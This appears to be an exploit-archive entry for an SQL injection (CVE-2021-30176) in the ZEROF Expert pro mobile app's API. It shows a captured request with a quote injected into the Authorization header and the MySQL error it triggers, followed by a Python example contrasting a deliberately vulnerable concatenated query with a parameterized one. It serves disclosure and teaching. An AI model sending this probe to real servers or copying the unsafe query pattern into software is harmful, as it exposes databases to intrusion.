# CVE-2021-30176 ZEROF Expert pro/2.0 application for mobile devices SQL injection vulnerability
==EXP==

POST /v2/devices/add HTTP/1.1
Host: zerof
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Date: Thu, 07 Apr 2021 13:40:57 +0300
Content-Length: 241
User-Agent: ZEROF Expert pro/2.0 (com.zerof.expertpro; build:2; iOS 14.4.0) Alamofire/4.8.2
Accept-Language: ru-RU;q=1.0
Authorization: ZWS admin':e4NQCMRQELfsoddJwJPz/YoB3ak=
Accept-Encoding: gzip, deflate

device=?unrecognized?&geo=55.70402368871489%2C37.615802664058954&os=iOS%2014.4&token=f9Q0hE5JRpE%3AAPA91bFP19KGIIwJyLrbTuLwtP_jUvkUqqFM_k4W8czxm3ajT5Rh0jD2OHO_NmRIeY1C9zjzzNS_ch8VlNy2Bnqj5FcIdrWIFEevprpMGf3k96uFHuUsaa3aF8FS-RGwIsY8AXcUYcOP

HTTP/1.1 500 Internal Server Error
Connection: close
Content-Type: application/json; charset=utf-8
Content-Length: 176
Date: Wed, 07 Apr 2021 10:35:59 GMT
Server: ZEROF Web Server

 #42000You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin'')' at line 1 
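
The 500 response above shows the login part of the `Authorization: ZWS <login>:<signature>` header (format inferred from the capture) reaching the MySQL statement as text. The following is an added example, not code from this page or from ZEROF, contrasting a string-built lookup with a bound-parameter one; the table, query shape and function names are assumptions, and in-memory SQLite stands in for MySQL.

```python
import sqlite3

# Constructed stand-in for the server's user table; the real schema is not on the page.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (login TEXT PRIMARY KEY, secret TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    return db

def parse_zws(header):
    """Split 'ZWS <login>:<signature>' into (login, signature)."""
    scheme, _, credentials = header.partition(" ")
    if scheme != "ZWS" or ":" not in credentials:
        raise ValueError("malformed Authorization header")
    # A base64 signature never contains ':', so split on the last one.
    login, _, signature = credentials.rpartition(":")
    return login, signature

def lookup_concatenated(db, login):
    # Weak form: header value pasted into the statement text. The trailing ')'
    # mirrors the fragment in the error message; the rest of the query is assumed.
    sql = "SELECT login FROM users WHERE (login = '" + login + "')"
    return db.execute(sql).fetchone()

def lookup_bound(db, login):
    # Hardened form: the value travels as a bound parameter, never as SQL text.
    return db.execute("SELECT login FROM users WHERE (login = ?)", (login,)).fetchone()

def classify(db, header, lookup):
    """Return 'ok', 'unknown-user' or 'sql-error' for one Authorization header."""
    login, _ = parse_zws(header)
    try:
        row = lookup(db, login)
    except sqlite3.Error:
        return "sql-error"  # the condition that surfaced as HTTP 500 in the capture
    return "ok" if row else "unknown-user"

if __name__ == "__main__":
    db = make_db()
    quoted = "ZWS admin':e4NQCMRQELfsoddJwJPz/YoB3ak="  # header from the capture
    clean = "ZWS admin:e4NQCMRQELfsoddJwJPz/YoB3ak="
    for name, fn in (("concatenated", lookup_concatenated), ("bound", lookup_bound)):
        print(name, classify(db, quoted, fn), classify(db, clean, fn))
```

With the bound lookup, the quoted login is compared as a literal string and simply matches no user, so the request can be rejected as an authentication failure instead of producing a database error.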